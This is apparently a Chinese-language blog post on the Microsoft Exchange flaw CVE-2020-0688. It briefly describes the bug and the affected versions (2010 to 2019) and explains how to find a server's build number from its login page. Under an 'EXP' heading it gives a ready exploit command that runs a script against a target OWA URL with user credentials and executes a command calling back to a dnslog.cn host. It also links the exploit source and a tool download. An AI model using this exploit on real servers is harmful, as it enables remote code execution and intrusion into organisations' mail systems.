## 漏洞概述
由于Exchange服务器在安装时没有正确地创建唯一的加密密钥所造成的
## 影响范围
“`http
#需要域用户登陆
2010、2013、2016、2019
“`
**对于如何识别版本可以用如下的方式**:
在登录界面查看网页源代码,15.1.225就是版本,之后在[Mircosoft网站](https://docs.microsoft.com/zh-cn/Exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019)上根据版本号就可以直接查询
“`html
找到
“`
## EXP
“`bash
python CVE-2020-0688.py -s https://ip/owa/ -u user -p pass -c “ping test.ph4nxq.dnslog.cn”
“`
[@Ridter](https://github.com/Ridter/cve-2020-0688)
[点我下载]( /Gr33kLibrary/download_tool/64/)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容